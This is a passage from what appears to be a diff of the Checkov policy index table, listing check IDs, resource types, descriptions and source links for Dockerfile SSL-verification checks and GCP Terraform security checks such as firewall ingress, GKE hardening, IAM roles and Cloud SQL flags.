'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) | +| 2215 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) | +| 2216 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | +| 2217 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | +| 2218 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) | +| 2219 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) | +| 2220 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) | +| 2221 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) | +| 2222 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) | +| 2223 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) | +| 2224 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) | +| 2225 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) | +| 2226 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) | +| 2227 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) | +| 2228 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) | +| 2229 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) | +| 2230 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) | +| 2231 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) | +| 2232 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) | +| 2233 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) | +| 2234 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) | +| 2235 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) | +| 2236 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) | +| 2237 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) | +| 2238 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) | +| 2239 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) | +| 2240 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) | +| 2241 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) | +| 2242 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) | +| 2243 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) | +| 2244 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) | +| 2245 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 2246 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) | +| 2247 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) | +| 2248 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2249 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2250 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) | +| 2251 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2252 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2253 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) | +| 2254 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2255 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2256 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) | +| 2257 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) | +| 2258 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2259 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2260 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) | +| 2261 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2262 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2263 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) | +| 2264 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2265 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2266 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) | +| 2267 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) | +| 2268 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) | +| 2269 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2270 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2271 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) | +| 2272 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2273 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2274 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) | +| 2275 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2276 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) | +| 2277 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) | +| 2278 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) | +| 2279 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2280 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) | +| 2281 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2282 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) | +| 2283 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2284 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) | +| 2285 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2286 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) | +| 2287 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2288 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) | +| 2289 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2290 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) | +| 2291 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) | +| 2292 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) | +| 2293 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) | +| 2294 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) | +| 2295 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) | +| 2296 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) | +| 2297 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) | +| 2298 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) | +| 2299 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) | +| 2300 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) | +| 2301 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) | +| 2302 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) | +| 2303 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) | +| 2304 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) | +| 2305 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) | +| 2306 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) | +| 2307 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) | +| 2308 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2309 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) | +| 2310 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2311 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) | +| 2312 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) | +| 2313 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) | +| 2314 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2315 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) | +| 2316 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | +| 2317 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | +| 2318 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | 